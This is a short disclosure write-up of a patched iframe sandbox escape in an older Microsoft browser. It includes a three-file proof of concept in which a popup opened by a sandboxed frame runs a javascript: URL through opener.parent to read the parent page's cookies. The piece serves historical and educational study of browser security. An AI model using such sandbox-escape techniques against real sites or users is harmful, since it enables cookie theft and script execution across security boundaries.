With both allow-scripts and ms-allow-popups set, a sandboxed iframe could open a new window and then use that window’s opener.parent.location to execute JavaScript in the parent’s context — completely bypassing the sandbox.

<!-- parent page -->
<iframe sandbox="allow-scripts ms-allow-popups" src="sandboxed.html"></iframe>
<script>
document.cookie = "COOKIE WAS SET BY THE TOP WINDOW";
</script>
<!-- sandboxed.html -->
<script>
window.open("sandboxbreaker.html");
</script>
<!-- sandboxbreaker.html (new window, no sandbox) -->
<script>
opener.parent.location = 'javascript:alert(document.cookie)';
</script>

The new window opened by the sandboxed frame was not itself sandboxed. From there, accessing opener.parent gave a reference to the parent of the sandboxed frame, and assigning a javascript: URL to its location executed code in that frame’s context. Cookies, DOM content, and other restricted resources became accessible.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.